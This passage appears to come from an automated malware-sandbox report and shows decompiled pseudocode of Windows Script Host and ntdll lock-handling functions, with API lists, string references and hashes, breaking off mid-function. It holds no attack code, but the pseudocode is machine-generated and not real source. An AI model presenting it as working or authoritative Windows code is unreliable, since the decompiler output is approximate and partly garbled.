                                                        0x00b8233c
                                                        0x00000000
                                                        0x00b8233c
                                                        0x00b82336

                                                        APIs
                                                          • Part of subcall function 00B837F5: LoadLibraryA.KERNEL32(kernel32.dll), ref: 00B8380C
                                                          • Part of subcall function 00B837F5: GetProcAddress.KERNEL32(00000000,HeapSetInformation), ref: 00B83822
                                                          • Part of subcall function 00B837F5: FreeLibrary.KERNEL32(00000000), ref: 00B83836
                                                          • Part of subcall function 00B8461D: ??2@YAPAXI@Z.MSVCRT ref: 00B84624
                                                        • GetModuleFileNameW.KERNEL32(00B82238,00000105,00000000,00B8246C,00000001,?), ref: 00B8231F
                                                          • Part of subcall function 00B839B0: CoRegisterMessageFilter.OLE32(?,?), ref: 00B839BA
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.687768128.0000000000B80000.00000040.00020000.sdmp, Offset: 00B80000, based on PE: true
                                                        Similarity
                                                        • API ID: Library$??2@AddressFileFilterFreeLoadMessageModuleNameProcRegister
                                                        • String ID: W
                                                        • API String ID: 1557387897-655174618
                                                        • Opcode ID: fef41a2c501de93e619ffb650cf66219fe16d855c3c02f940c46bf4efdf1de36
                                                        • Instruction ID: c339bac17fa468e1e3ef42ee0a5e99992c985b20bc024cc954fbb7e17ebb7438
                                                        • Opcode Fuzzy Hash: fef41a2c501de93e619ffb650cf66219fe16d855c3c02f940c46bf4efdf1de36
                                                        • Instruction Fuzzy Hash: 47C1B3719081949FDB31BF24CC84BAAB7F8AF05304F1445E9E54AA7261DF30AE85CF61
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        C-Code - Quality: 39%
                                                        			E00B81F26(intOrPtr* __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr* _a24) {
                                                        				signed int _v8;
                                                        				char _v528;
                                                        				signed int _v532;
                                                        				signed int _v536;
                                                        				intOrPtr* _v540;
                                                        				intOrPtr _v544;
                                                        				char _v548;
                                                        				void* __ebx;
                                                        				void* __edi;
                                                        				void* __esi;
                                                        				signed int _t40;
                                                        				void* _t43;
                                                        				intOrPtr _t44;
                                                        				intOrPtr* _t46;
                                                        				intOrPtr* _t47;
                                                        				intOrPtr _t56;
                                                        				intOrPtr _t57;
                                                        				intOrPtr _t60;
                                                        				intOrPtr* _t62;
                                                        				intOrPtr* _t63;
                                                        				intOrPtr* _t64;
                                                        				void* _t69;
                                                        				intOrPtr _t72;
                                                        				intOrPtr _t81;
                                                        				intOrPtr* _t88;
                                                        				intOrPtr* _t90;
                                                        				intOrPtr _t94;
                                                        				intOrPtr* _t95;
                                                        				void* _t96;
                                                        				intOrPtr* _t97;
                                                        				intOrPtr* _t98;
                                                        				intOrPtr* _t99;
                                                        				signed int _t100;
                                                        
                                                        				_t92 = __edx;
                                                        				_t40 =  *0xb97004; // 0xbb40e64e
                                                        				_v8 = _t40 ^ _t100;
                                                        				_v536 = _v536 & 0x00000000;
                                                        				_v532 = _v532 & 0x00000000;
                                                        				_t72 = _a16;
                                                        				_t99 = __ecx;
                                                        				_t94 = _a4;
                                                        				_v544 = _a20;
                                                        				_v540 = _a24;
                                                        				_t43 = E00B844E0(__ecx, __edx, _a8, _a12);
                                                        				if(_t43 < 0) {
                                                        					L26:
                                                        					_t92 =  *_t99;
                                                        					_t44 =  *0xb9702c; // 0x0
                                                        					_t46 =  *((intOrPtr*)( *_t99))(_t44 + 0x14, 0xc80, _t43);
                                                        					L32:
                                                        					_t95 = _t46;
                                                        					L14:
                                                        					if(_t95 < 0) {
                                                        						L18:
                                                        						__eflags = _t95 - 0x8004ffff;
                                                        						if(_t95 != 0x8004ffff) {
                                                        							__eflags = _t95 - 0x80020101;
                                                        							if(_t95 == 0x80020101) {
                                                        								goto L15;
                                                        							}
                                                        							L40:
                                                        							_t81 =  *0xb9702c; // 0x0
                                                        							_t95 =  *((intOrPtr*)( *_t99))(_t81 + 0x14, 0xc86, _t95);
                                                        							goto L15;
                                                        						}
                                                        					}
                                                        					L15:
                                                        					_t47 = _v536;
                                                        					if(_t47 != 0) {
                                                        						 *((intOrPtr*)( *_t47 + 8))(_t47);
                                                        					}
                                                        					__imp__#6(_v532);
                                                        					_pop(_t96);
                                                        					return E00B81335(_t95, _t72, _v8 ^ _t100, _t92, _t96, _t99);
                                                        				}
                                                        				_t43 = E00B83B1E(__edx, _t94, 0x104,  &_v528,  &_v548);
                                                        				if(_t43 < 0) {
                                                        					goto L26;
                                                        				}
                                                        				_t97 = __imp__#2;
                                                        				_t56 =  *_t97( &_v528);
                                                        				 *((intOrPtr*)(_t99 + 0x238)) = _t56;
                                                        				if(_t56 == 0) {
                                                        					L27:
                                                        					_t95 = 0x8007000e;
                                                        					goto L40;
                                                        				}
                                                        				_t57 =  *_t97(_v548);
                                                        				 *((intOrPtr*)(_t99 + 0x23c)) = _t57;
                                                        				if(_t57 == 0) {
                                                        					goto L27;
                                                        				}
                                                        				_t95 = E00B828D9(_t72, _t99, __edx, _t72);
                                                        				if(_t95 < 0) {
                                                        					__eflags = _t95 - 0x8004ffff;
                                                        					if(_t95 == 0x8004ffff) {
                                                        						goto L14;
                                                        					}
                                                        					_t98 = E00B83D0D( *((intOrPtr*)(_t99 + 0x238)), 0x2e);
                                                        					__eflags = _t98;
                                                        					if(_t98 == 0) {
                                                        						_push( *((intOrPtr*)(_t99 + 0x238)));
                                                        						_push(0xcea);
                                                        						L38:
                                                        						_t60 =  *0xb9702c; // 0x0
                                                        						_push(_t60 + 0x15);
                                                        						_t62 = E00B8F321(_t99);
                                                        						L12:
                                                        						_t95 = _t62;
                                                        						if(_t95 < 0) {
                                                        							goto L18;
                                                        						}
                                                        						_t95 = 0;
                                                        						goto L14;
                                                        					}
                                                        					_t63 = E00B82753(_t98, L".wsf", 0xffffffff);
                                                        					__eflags = _t63;
                                                        					if(_t63 != 0) {
                                                        						_push(_t98);
                                                        						_push(0xced);
                                                        						goto L38;
                                                        					}
                                                        					_t64 = _v540;
                                                        					__eflags = _t64;
                                                        					if(_t64 != 0) {
                                                        						_v536 = _t64;
                                                        						 *((intOrPtr*)( *_t64 + 4))(_t64);
                                                        						L25:
                                                        						_t62 = E00B866C1(_t99, _v536, _v544);
                                                        						goto L12;
                                                        					}
                                                        					_t95 = E00B86E2B(0,  *((intOrPtr*)(_t99 + 0x238)),  &_v536);
                                                        					__eflags = _t95;
                                                        					if(_t95 < 0) {
                                                        						goto L18;
                                                        					}
                                                        					goto L25;
                                                        				}
                                                        				_t106 = _v540;
                                                        				_t88 = _t99;
                                                        				_push( &_v532);
                                                        				if(_v540 != 0) {
                                                        					_push(_v540);
                                                        					_t69 = E00B9041E(_t88);
                                                        				} else {
                                                        					_t69 = E00B85497(_t72, _t88, _t92, _t106);
                                                        				}
                                                        				if(_t69 < 0) {
                                                        					__eflags = _t69 - 0x800c0005;
                                                        					if(_t69 == 0x800c0005) {
                                                        						_t69 = 0x80070002;
                                                        					}
                                                        					_t46 = E00B8F362(_t99, _t69);
                                                        					goto L32;
                                                        				} else {
                                                        					_push(_v532);
                                                        					_t90 = _t99;
                                                        					if( *((char*)(_t99 + 0x26)) == 0) {
                                                        						L34:
                                                        						_t95 = E00B9059B(_t90);
                                                        						L10:
                                                        						if(_t95 < 0) {
                                                        							goto L18;
                                                        						}
                                                        						_t62 = E00B8267D(_t99, _v532);
                                                        						goto L12;
                                                        					}
                                                        					_t95 = E00B84BA1(_t90, _t95);
                                                        					if(_t95 == 1) {
                                                        						_push(_v532);
                                                        						_t90 = _t99;
                                                        						goto L34;
                                                        					}
                                                        					goto L10;
                                                        				}
                                                        			}
                                                        0x00b81ff1
                                                        0x00b81ff2
                                                        0x00b88914
                                                        0x00b8891a
                                                        0x00b81ff8
                                                        0x00b81ff8
                                                        0x00b81ff8
                                                        0x00b81fff
                                                        0x00b88924
                                                        0x00b88929
                                                        0x00b8892b
                                                        0x00b8892b
                                                        0x00b88933
                                                        0x00000000
                                                        0x00b82005
                                                        0x00b82009
                                                        0x00b8200f
                                                        0x00b82011
                                                        0x00b88947
                                                        0x00b8894c
                                                        0x00b82027
                                                        0x00b82029
                                                        0x00000000
                                                        0x00000000
                                                        0x00b82037
                                                        0x00000000
                                                        0x00b82037
                                                        0x00b8201c
                                                        0x00b82021
                                                        0x00b8893f
                                                        0x00b88945
                                                        0x00000000
                                                        0x00b88945
                                                        0x00000000
                                                        0x00b82021

                                                        APIs
                                                          • Part of subcall function 00B83B1E: GetFullPathNameW.KERNEL32(?,?,?,?,?,?,?,?), ref: 00B83B4F
                                                        • SysAllocString.OLEAUT32(?), ref: 00B81FAA
                                                        • SysAllocString.OLEAUT32(?), ref: 00B81FC0
                                                          • Part of subcall function 00B84BA1: GetProcAddress.KERNEL32(?,SaferIdentifyLevel,00000000,advapi32.dll,?,?,?), ref: 00B84C1A
                                                          • Part of subcall function 00B84BA1: GetProcAddress.KERNEL32(?,SaferComputeTokenFromLevel,?,?), ref: 00B84C32
                                                          • Part of subcall function 00B84BA1: GetProcAddress.KERNEL32(?,SaferCloseLevel,?,?), ref: 00B84C4A
                                                          • Part of subcall function 00B84BA1: memset.MSVCRT ref: 00B84C6A
                                                          • Part of subcall function 00B84BA1: memset.MSVCRT ref: 00B84C99
                                                        • SysFreeString.OLEAUT32(00000000), ref: 00B82064
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.687768128.0000000000B80000.00000040.00020000.sdmp, Offset: 00B80000, based on PE: true
                                                        Similarity
                                                        • API ID: AddressProcString$Allocmemset$FreeFullNamePath
                                                        • String ID: .wsf
                                                        • API String ID: 3996831049-2429851548
                                                        • Opcode ID: 5239ae02220101a6457966414b048ee6458a16183bf1f2c0f805c7fddd3870d2
                                                        • Instruction ID: 5d5f6b00295f50f7a0b10985e5684e63c65247e327bb7f6f52e2e1cfcf100475
                                                        • Opcode Fuzzy Hash: 5239ae02220101a6457966414b048ee6458a16183bf1f2c0f805c7fddd3870d2
                                                        • Instruction Fuzzy Hash: A551A3356402199BCB21BB28CC85BAE77EAAF94714F6004E9E41AE7271DF34DE41CB61
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        C-Code - Quality: 44%
                                                        			E022F53A5(signed int _a4, char _a8) {
                                                        				void* __ebx;
                                                        				void* __edi;
                                                        				void* __esi;
                                                        				signed int _t32;
                                                        				signed int _t37;
                                                        				signed int _t40;
                                                        				signed int _t42;
                                                        				void* _t45;
                                                        				intOrPtr _t46;
                                                        				signed int _t49;
                                                        				void* _t51;
                                                        				signed int _t57;
                                                        				signed int _t64;
                                                        				signed int _t71;
                                                        				void* _t74;
                                                        				intOrPtr _t78;
                                                        				signed int* _t79;
                                                        				void* _t85;
                                                        				signed int _t86;
                                                        				signed int _t92;
                                                        				void* _t104;
                                                        				void* _t105;
                                                        
                                                        				_t64 = _a4;
                                                        				_t32 =  *(_t64 + 0x28);
                                                        				_t71 = _t64 + 0x28;
                                                        				_push(_t92);
                                                        				if(_t32 < 0) {
                                                        					_t78 =  *[fs:0x18];
                                                        					__eflags =  *((intOrPtr*)(_t64 + 0x2c)) -  *((intOrPtr*)(_t78 + 0x24));
                                                        					if( *((intOrPtr*)(_t64 + 0x2c)) !=  *((intOrPtr*)(_t78 + 0x24))) {
                                                        						goto L3;
                                                        					} else {
                                                        						__eflags = _t32 | 0xffffffff;
                                                        						asm("lock xadd [ecx], eax");
                                                        						return 1;
                                                        					}
                                                        				} else {
                                                        					L3:
                                                        					_push(_t86);
                                                        					while(1) {
                                                        						L4:
                                                        						__eflags = _t32;
                                                        						if(_t32 == 0) {
                                                        							break;
                                                        						}
                                                        						__eflags = _a8;
                                                        						if(_a8 == 0) {
                                                        							__eflags = 0;
                                                        							return 0;
                                                        						} else {
                                                        							 *((intOrPtr*)( *((intOrPtr*)(_t64 + 0x34)) + 0x14)) =  *((intOrPtr*)( *((intOrPtr*)(_t64 + 0x34)) + 0x14)) + 1;
                                                        							_t79 = _t64 + 0x24;
                                                        							_t71 = 1;
                                                        							asm("lock xadd [eax], ecx");
                                                        							_t32 =  *(_t64 + 0x28);
                                                        							_a4 = _t32;
                                                        							__eflags = _t32;
                                                        							if(_t32 != 0) {
                                                        								L19:
                                                        								_t86 = 0;
                                                        								__eflags = 0;
                                                        								while(1) {
                                                        									_t81 =  *(_t64 + 0x30) & 0x00000001;
                                                        									asm("sbb esi, esi");
                                                        									_t92 =  !( ~( *(_t64 + 0x30) & 1)) & 0x023b01c0;
                                                        									_push(_t92);
                                                        									_push(0);
                                                        									_t37 = E022CF8CC( *((intOrPtr*)(_t64 + 0x20)));
                                                        									__eflags = _t37 - 0x102;
                                                        									if(_t37 != 0x102) {
                                                        										break;
                                                        									}
                                                        									_t71 =  *(_t92 + 4);
                                                        									_t85 =  *_t92;
                                                        									_t51 = E02314FC0(_t85, _t71, 0xff676980, 0xffffffff);
                                                        									_push(_t85);
                                                        									_push(_t51);
                                                        									E02323F92(0x65, 0, "RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)\n", _t86);
                                                        									E02323F92(0x65, 0, "RTL: Resource at %p\n", _t64);
                                                        									_t86 = _t86 + 1;
                                                        									_t105 = _t104 + 0x28;
                                                        									__eflags = _t86 - 2;
                                                        									if(__eflags > 0) {
                                                        										E0235217A(_t71, __eflags, _t64);
                                                        									}
                                                        									_push("RTL: Re-Waiting\n");
                                                        									_push(0);
                                                        									_push(0x65);
                                                        									E02323F92();
                                                        									_t104 = _t105 + 0xc;
                                                        								}
                                                        								__eflags = _t37;
                                                        								if(__eflags < 0) {
                                                        									_push(_t37);
                                                        									E02313915(_t64, _t71, _t81, _t86, _t92, __eflags);
                                                        									asm("int3");
                                                        									_t40 =  *_t71;
                                                        									 *_t71 = 0;
                                                        									__eflags = _t40;
                                                        									if(_t40 == 0) {
                                                        										L1:
                                                        										_t42 = E022F5384(_t92 + 0x24);
                                                        										if(_t42 != 0) {
                                                        											goto L31;
                                                        										} else {
                                                        											goto L2;
                                                        										}
                                                        									} else {
                                                        										_t83 =  *((intOrPtr*)(_t92 + 0x18));
                                                        										_push( &_a4);
                                                        										_push(_t40);
                                                        										_t49 = E022CF970( *((intOrPtr*)(_t92 + 0x18)));
                                                        										__eflags = _t49;
                                                        										if(__eflags >= 0) {
                                                        											goto L1;
                                                        										} else {
                                                        											_push(_t49);
                                                        											E02313915(_t64,  &_a4, _t83, _t86, _t92, __eflags);
                                                        											L31:
                                                        											_t82 =  *((intOrPtr*)(_t92 + 0x20));
                                                        											_push( &_a4);
                                                        											_push(1);
                                                        											_t42 = E022CF970( *((intOrPtr*)(_t92 + 0x20)));
                                                        											__eflags = _t42;
                                                        											if(__eflags >= 0) {
                                                        												L2:
                                                        												return _t42;
                                                        											} else {
                                                        												_push(_t42);
                                                        												E02313915(_t64,  &_a4, _t82, _t86, _t92, __eflags);
                                                        												_t73 =  *((intOrPtr*)(_t92 + 0x20));
                                                        												_push( &_a4);
                                                        												_push(1);
                                                        												_t42 = E022CF970( *((intOrPtr*)(_t92 + 0x20)));
                                                        												__eflags = _t42;
                                                        												if(__eflags >= 0) {
                                                        													goto L2;
                                                        												} else {
                                                        													_push(_t42);
                                                        													_t45 = E02313915(_t64, _t73, _t82, _t86, _t92, __eflags);
                                                        													asm("int3");
                                                        													while(1) {
                                                        														_t74 = _t45;
                                                        														__eflags = _t45 - 1;
                                                        														if(_t45 != 1) {
                                                        															break;
                                                        														}
                                                        														_t86 = _t86 | 0xffffffff;
                                                        														_t45 = _t74;
                                                        														asm("lock cmpxchg [ebx], edi");
                                                        														__eflags = _t45 - _t74;
                                                        														if(_t45 != _t74) {
                                                        															continue;
                                                        														} else {
                                                        															_t46 =  *[fs:0x18];
                                                        															 *((intOrPtr*)(_t92 + 0x2c)) =  *((intOrPtr*)(_t46 + 0x24));
                                                        															return _t46;
                                                        														}
                                                        														goto L37;
                                                        													}
                                                        													E022F5329(_t74, _t92);
                                                        													_push(1);
                                                        													return E022F53A5(_t92);
                                                        												}
                                                        											}
                                                        										}
                                                        									}
                                                        								} else {
                                                        									_t32 =  *(_t64 + 0x28);
                                                        									continue;
                                                        								}
                                                        							} else {
                                                        								_t71 =  *_t79;
                                                        								__eflags = _t71;
                                                        								if(__eflags > 0) {
                                                        									while(1) {
                                                        										_t57 = _t71;
                                                        										asm("lock cmpxchg [edi], esi");
                                                        										__eflags = _t57 - _t71;
                                                        										if(_t57 == _t71) {
                                                        											break;
                                                        										}
                                                        										_t71 = _t57;
                                                        										__eflags = _t57;
                                                        										if(_t57 > 0) {
                                                        											continue;
                                                        										}
                                                        										break;
                                                        									}
                                                        									_t32 = _a4;
                                                        									__eflags = _t71;
                                                        								}
                                                        								if(__eflags != 0) {
                                                        									continue;
                                                        								} else {
                                                        									goto L19;
                                                        								}
                                                        							}
                                                        						}
                                                        						goto L37;
                                                        					}
                                                        					_t71 = _t71 | 0xffffffff;
                                                        					_t32 = 0;
                                                        					asm("lock cmpxchg [edx], ecx");
                                                        					__eflags = 0;
                                                        					if(0 != 0) {
                                                        						goto L4;
                                                        					} else {
                                                        						 *((intOrPtr*)(_t64 + 0x2c)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
                                                        						return 1;
                                                        					}
                                                        				}
                                                        				L37:
                                                        			}

                                                        0x023323c6
                                                        0x023323cb
                                                        0x023323d7
                                                        0x023323d7
                                                        0x023323ad
                                                        0x02332390
                                                        0x02332373
                                                        0x0233233f
                                                        0x0233233f
                                                        0x00000000
                                                        0x0233233f
                                                        0x02332291
                                                        0x02332291
                                                        0x02332293
                                                        0x02332295
                                                        0x0233229a
                                                        0x023322a1
                                                        0x023322a3
                                                        0x023322a7
                                                        0x023322a9
                                                        0x00000000
                                                        0x00000000
                                                        0x023322ab
                                                        0x023322ad
                                                        0x023322af
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x023322af
                                                        0x023322b1
                                                        0x023322b4
                                                        0x023322b4
                                                        0x023322b6
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x023322b6
                                                        0x0233228f
                                                        0x00000000
                                                        0x0233226d
                                                        0x022f53cb
                                                        0x022f53ce
                                                        0x022f53d0
                                                        0x022f53d4
                                                        0x022f53d6
                                                        0x00000000
                                                        0x022f53d8
                                                        0x022f53e3
                                                        0x022f53ea
                                                        0x022f53ea
                                                        0x022f53d6
                                                        0x00000000

                                                        APIs
                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 023322F4
                                                        Strings
                                                        • RTL: Resource at %p, xrefs: 0233230B
                                                        • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 023322FC
                                                        • RTL: Re-Waiting, xrefs: 02332328
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.688194486.00000000022C0000.00000040.00000001.sdmp, Offset: 022B0000, based on PE: true
                                                        • Associated: 0000000D.00000002.688187161.00000000022B0000.00000040.00000001.sdmp
                                                        • Associated: 0000000D.00000002.688305042.00000000023A0000.00000040.00000001.sdmp
                                                        • Associated: 0000000D.00000002.688312609.00000000023B0000.00000040.00000001.sdmp
                                                        • Associated: 0000000D.00000002.688320304.00000000023B4000.00000040.00000001.sdmp
                                                        • Associated: 0000000D.00000002.688327822.00000000023B7000.00000040.00000001.sdmp
                                                        • Associated: 0000000D.00000002.688335301.00000000023C0000.00000040.00000001.sdmp
                                                        • Associated: 0000000D.00000002.688370384.0000000002420000.00000040.00000001.sdmp
                                                        Similarity
                                                        • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                        • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                        • API String ID: 885266447-871070163
                                                        • Opcode ID: 2219edf6fd7d5631e7d5e4618142f02fec57bc7692ec64fea9c96993396cfbc4
                                                        • Instruction ID: 1ceaea33396837ee4da27f56cad2ea8d6f968cb75a91d2e3a1dcab2442f1db71
                                                        • Opcode Fuzzy Hash: 2219edf6fd7d5631e7d5e4618142f02fec57bc7692ec64fea9c96993396cfbc4
                                                        • Instruction Fuzzy Hash: 935108716107156BEB25DB69DC80FA773AAAF44324F114229FE05DF244E771E9418BA0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        C-Code - Quality: 51%
                                                        			E022FEC56(void* __ecx, void* __edx, intOrPtr* __edi, intOrPtr _a4, intOrPtr _a8) {
                                                        				intOrPtr _v8;
                                                        				intOrPtr _v12;
                                                        				signed int _v24;
                                                        				intOrPtr* _v28;
                                                        				intOrPtr _v32;
                                                        				signed int _v36;
                                                        				intOrPtr _v40;
                                                        				short _v66;
                                                        				char _v72;
                                                        				void* __esi;
                                                        				intOrPtr _t38;
                                                        				intOrPtr _t39;
                                                        				signed int _t40;
                                                        				intOrPtr _t42;
                                                        				intOrPtr _t43;
                                                        				signed int _t44;
                                                        				void* _t46;
                                                        				intOrPtr _t48;
                                                        				signed int _t49;
                                                        				intOrPtr _t50;
                                                        				intOrPtr _t53;
                                                        				signed char _t67;
                                                        				void* _t72;
                                                        				intOrPtr _t77;
                                                        				intOrPtr* _t80;
                                                        				intOrPtr _t84;
                                                        				intOrPtr* _t85;
                                                        				void* _t91;
                                                        				void* _t92;
                                                        				void* _t93;
                                                        
                                                        				_t80 = __edi;
                                                        				_t75 = __edx;
                                                        				_t70 = __ecx;
                                                        				_t84 = _a4;
                                                        				if( *((intOrPtr*)(_t84 + 0x10)) == 0) {
                                                        					E022EDA92(__ecx, __edx, __eflags, _t84);
                                                        					_t38 =  *((intOrPtr*)(_t84 + 0x10));
                                                        				}
                                                        				_push(0);
                                                        				__eflags = _t38 - 0xffffffff;
                                                        				if(_t38 == 0xffffffff) {
                                                        					_t39 =  *0x23b793c; // 0x0
                                                        					_push(0);
                                                        					_push(_t84);
                                                        					_t40 = E022D16C0(_t39);
                                                        				} else {
                                                        					_t40 = E022CF9D4(_t38);
                                                        				}
                                                        				_pop(_t85);
                                                        				__eflags = _t40;
                                                        				if(__eflags < 0) {
                                                        					_push(_t40);
                                                        					E02313915(_t67, _t70, _t75, _t80, _t85, __eflags);
                                                        					asm("int3");
                                                        					while(1) {
                                                        						L21:
                                                        						_t76 =  *[fs:0x18];
                                                        						_t42 =  *((intOrPtr*)( *[fs:0x18] + 0x30));
                                                        						__eflags =  *(_t42 + 0x240) & 0x00000002;
                                                        						if(( *(_t42 + 0x240) & 0x00000002) != 0) {
                                                        							_v36 =  *(_t85 + 0x14) & 0x00ffffff;
                                                        							_v66 = 0x1722;
                                                        							_t71 =  *((intOrPtr*)(_t85 + 0xc));
                                                        							_t76 =  &_v72;
                                                        							_push( &_v72);
                                                        							_v28 = _t85;
                                                        							_v40 =  *((intOrPtr*)(_t85 + 4));
                                                        							_v32 =  *((intOrPtr*)(_t85 + 0xc));
                                                        							_push(0x10);
                                                        							_push(0x20402);
                                                        							E022D01A4( *0x7ffe0382 & 0x000000ff);
                                                        						}
                                                        						while(1) {
                                                        							_t43 = _v8;
                                                        							_push(_t80);
                                                        							_push(0);
                                                        							__eflags = _t43 - 0xffffffff;
                                                        							if(_t43 == 0xffffffff) {
                                                        								_t71 =  *0x23b793c; // 0x0
                                                        								_push(_t85);
                                                        								_t44 = E022D1F28(_t71);
                                                        							} else {
                                                        								_t44 = E022CF8CC(_t43);
                                                        							}
                                                        							__eflags = _t44 - 0x102;
                                                        							if(_t44 != 0x102) {
                                                        								__eflags = _t44;
                                                        								if(__eflags < 0) {
                                                        									_push(_t44);
                                                        									E02313915(_t67, _t71, _t76, _t80, _t85, __eflags);
                                                        									asm("int3");
                                                        									E02352306(_t85);
                                                        									__eflags = _t67 & 0x00000002;
                                                        									if((_t67 & 0x00000002) != 0) {
                                                        										_t7 = _t67 + 2; // 0x4
                                                        										_t72 = _t7;
                                                        										asm("lock cmpxchg [edi], ecx");
                                                        										__eflags = _t67 - _t67;
                                                        										if(_t67 == _t67) {
                                                        											E022FEC56(_t72, _t76, _t80, _t85);
                                                        										}
                                                        									}
                                                        									return 0;
                                                        								} else {
                                                        									__eflags = _v24;
                                                        									if(_v24 != 0) {
                                                        										 *((intOrPtr*)(_v12 + 0xf84)) = 0;
                                                        									}
                                                        									return 2;
                                                        								}
                                                        								goto L36;
                                                        							}
                                                        							_t77 =  *((intOrPtr*)(_t80 + 4));
                                                        							_push(_t67);
                                                        							_t46 = E02314FC0( *_t80, _t77, 0xff676980, 0xffffffff);
                                                        							_push(_t77);
                                                        							E02323F92(0x65, 1, "RTL: Enter Critical Section Timeout (%I64u secs) %d\n", _t46);
                                                        							_t48 =  *_t85;
                                                        							_t92 = _t91 + 0x18;
                                                        							__eflags = _t48 - 0xffffffff;
                                                        							if(_t48 == 0xffffffff) {
                                                        								_t49 = 0;
                                                        								__eflags = 0;
                                                        							} else {
                                                        								_t49 =  *((intOrPtr*)(_t48 + 0x14));
                                                        							}
                                                        							_t71 =  *((intOrPtr*)(_t85 + 0xc));
                                                        							_push(_t49);
                                                        							_t50 = _v12;
                                                        							_t76 =  *((intOrPtr*)(_t50 + 0x24));
                                                        							_push(_t85);
                                                        							_push( *((intOrPtr*)(_t85 + 0xc)));
                                                        							_push( *((intOrPtr*)(_t50 + 0x24)));
                                                        							E02323F92(0x65, 0, "RTL: Pid.Tid %x.%x, owner tid %x Critical Section %p - ContentionCount == %lu\n",  *((intOrPtr*)(_t50 + 0x20)));
                                                        							_t53 =  *_t85;
                                                        							_t93 = _t92 + 0x20;
                                                        							_t67 = _t67 + 1;
                                                        							__eflags = _t53 - 0xffffffff;
                                                        							if(_t53 != 0xffffffff) {
                                                        								_t71 =  *((intOrPtr*)(_t53 + 0x14));
                                                        								_a4 =  *((intOrPtr*)(_t53 + 0x14));
                                                        							}
                                                        							__eflags = _t67 - 2;
                                                        							if(_t67 > 2) {
                                                        								__eflags = _t85 - 0x23b20c0;
                                                        								if(_t85 != 0x23b20c0) {
                                                        									_t76 = _a4;
                                                        									__eflags = _a4 - _a8;
                                                        									if(__eflags == 0) {
                                                        										E0235217A(_t71, __eflags, _t85);
                                                        									}
                                                        								}
                                                        							}
                                                        							_push("RTL: Re-Waiting\n");
                                                        							_push(0);
                                                        							_push(0x65);
                                                        							_a8 = _a4;
                                                        							E02323F92();
                                                        							_t91 = _t93 + 0xc;
                                                        							__eflags =  *0x7ffe0382;
                                                        							if( *0x7ffe0382 != 0) {
                                                        								goto L21;
                                                        							}
                                                        						}
                                                        						goto L36;
                                                        					}
                                                        				} else {
                                                        					return _t40;
                                                        				}
                                                        				L36:
                                                        			}

                                                        Strings
                                                        • RTL: Pid.Tid %x.%x, owner tid %x Critical Section %p - ContentionCount == %lu, xrefs: 023324BD
                                                        • RTL: Enter Critical Section Timeout (%I64u secs) %d, xrefs: 0233248D
                                                        • RTL: Re-Waiting, xrefs: 023324FA
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.688194486.00000000022C0000.00000040.00000001.sdmp, Offset: 022B0000, based on PE: true
                                                        • Associated: 0000000D.00000002.688187161.00000000022B0000.00000040.00000001.sdmp
                                                        • Associated: 0000000D.00000002.688305042.00000000023A0000.00000040.00000001.sdmp
                                                        • Associated: 0000000D.00000002.688312609.00000000023B0000.00000040.00000001.sdmp
                                                        • Associated: 0000000D.00000002.688320304.00000000023B4000.00000040.00000001.sdmp
                                                        • Associated: 0000000D.00000002.688327822.00000000023B7000.00000040.00000001.sdmp
                                                        • Associated: 0000000D.00000002.688335301.00000000023C0000.00000040.00000001.sdmp
                                                        • Associated: 0000000D.00000002.688370384.0000000002420000.00000040.00000001.sdmp
                                                        Similarity
                                                        • API ID:
                                                        • String ID: RTL: Enter Critical Section Timeout (%I64u secs) %d$RTL: Pid.Tid %x.%x, owner tid %x Critical Section %p - ContentionCount == %lu$RTL: Re-Waiting
                                                        • API String ID: 0-3177188983
                                                        • Opcode ID: c6bb0dcfde3381e48d528e6d901b60ec22d5a48132e85671a14dcee5894f7992
                                                        • Instruction ID: 14ccf73c15144de93f704d5611bc1767cfe3f318f6f50ff7c3b5f35ea9b68c40
                                                        • Opcode Fuzzy Hash: c6bb0dcfde3381e48d528e6d901b60ec22d5a48132e85671a14dcee5894f7992
                                                        • Instruction Fuzzy Hash: 3441F470610304ABDB21DFA8CD85F6B77BAEF44720F108615FA699B2D4D774EA41CB60
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        C-Code - Quality: 84%
                                                        			E00B9407D() {
                                                        				signed int _v8;
                                                        				short _v16;
                                                        				struct _OSVERSIONINFOW _v292;
                                                        				void* __edi;
                                                        				void* __esi;
                                                        				signed int _t18;
                                                        				signed int _t20;
                                                        				void* _t27;
                                                        				intOrPtr _t30;
                                                        				void* _t31;
                                                        				void* _t35;
                                                        				void* _t38;
                                                        				void* _t40;
                                                        				signed int _t43;
                                                        				signed int _t46;
                                                        
                                                        				_t18 =  *0xb97004; // 0xbb40e64e
                                                        				_v8 = _t18 ^ _t43;
                                                        				_t46 =  *0xb974c8; // 0x0
                                                        				if(_t46 != 0) {
                                                        					L23:
                                                        					_t20 =  *0xb974c8; // 0x0
                                                        					return E00B81335(_t20, _t35, _v8 ^ _t43, _t38, 0, _t40);
                                                        				} else {
                                                        					_push(_t40);
                                                        					memset( &_v292, 0, 0x11c);
                                                        					_v292.dwOSVersionInfoSize = 0x11c;
                                                        					if(GetVersionExW( &_v292) == 0) {
                                                        						_v292.dwOSVersionInfoSize = 0x114;
                                                        						GetVersionExW( &_v292);
                                                        					}
                                                        					_t27 = _v292.dwPlatformId - 1;
                                                        					 *0xb974c8 = 0;
                                                        					_pop(_t40);
                                                        					if(_t27 == 0) {
                                                        						L18:
